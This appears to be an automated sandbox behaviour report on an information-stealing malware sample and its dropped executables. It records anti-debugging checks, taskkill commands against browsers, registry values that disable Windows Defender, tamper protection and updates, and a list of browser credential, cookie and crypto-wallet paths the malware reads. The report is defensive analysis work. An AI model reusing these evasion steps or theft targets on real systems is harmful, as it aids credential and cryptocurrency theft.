Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Documents\JKECGDBFCB.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process queried: DebugPort
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_04D90328 rdtsc 14_2_04D90328
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C535FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C535FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C53C410
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_0054652B mov eax, dword ptr fs:[00000030h] 14_2_0054652B
Source: C:\Users\user\Documents\JKECGDBFCB.exe Code function: 14_2_0054A302 mov eax, dword ptr fs:[00000030h] 14_2_0054A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D6A302 mov eax, dword ptr fs:[00000030h] 15_2_00D6A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 15_2_00D6652B mov eax, dword ptr fs:[00000030h] 15_2_00D6652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D6A302 mov eax, dword ptr fs:[00000030h] 16_2_00D6A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 16_2_00D6652B mov eax, dword ptr fs:[00000030h] 16_2_00D6652B
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C50B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C50B1F7
Source: C:\Users\user\Desktop\file.exe Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 815f2a8fe8.exe PID: 7552, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\JKECGDBFCB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\Documents\JKECGDBFCB.exe "C:\Users\user\Documents\JKECGDBFCB.exe"
Source: C:\Users\user\Documents\JKECGDBFCB.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe "C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe "C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe "C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe "C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe "C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe"
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 0d957dbf73.exe, 00000015.00000002.3187753102.0000000001042000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: JKECGDBFCB.exe, 0000000E.00000002.2625650832.0000000000753000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000F.00000002.2650885855.0000000000F73000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000010.00000002.2658172826.0000000000F73000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: nProgram Manager
Source: feb3d39b6a.exe, 00000013.00000002.3320178921.00000000005B8000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: 4Program Manager
Source: 2533b4b8c7.exe, 00000012.00000002.3320129822.00000000009AE000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: vProgram Manager
Source: firefox.exe, 00000023.00000002.3232053032.0000000CD79FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: file.exe, file.exe, 00000000.00000002.2594058159.00000000005BD000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: tProgram Manager
Source: feb3d39b6a.exe, 00000013.00000002.3346402660.000000000617A000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: $WProgram Manager
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50B341 cpuid 0_2_6C50B341
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4D35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C4D35A0
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1013585001\57a07eec2d.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: feb3d39b6a.exe, 00000013.00000003.3078764009.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3078878997.0000000000F78000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3310416758.0000000005674000.00000004.00000800.00020000.00000000.sdmp, feb3d39b6a.exe, 00000016.00000003.3286619408.0000000005672000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 14.2.JKECGDBFCB.exe.510000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.skotes.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.skotes.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.skotes.exe.d30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2623989684.0000000000511000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2649996256.0000000000D31000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.2653499661.0000000000D31000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3319241005.0000000000D31000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 0d957dbf73.exe PID: 6256, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: feb3d39b6a.exe PID: 6568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: feb3d39b6a.exe PID: 5080, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 00000014.00000002.3062536575.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3252381859.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.3244939214.0000000000BB1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3154801184.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.2971078627.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2048185134.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2593553859.00000000001E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.3069078994.0000000000BB1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2604363979.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 7096, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 815f2a8fe8.exe PID: 7552, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2593553859.0000000000347000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Liberty
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: allet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Exodus\exodus.wallet
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: file__0.localstorage
Source: file.exe, 00000000.00000002.2593553859.0000000000347000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: MultiDoge
Source: file.exe, 00000000.00000002.2593553859.00000000002B4000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: seed.seco
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
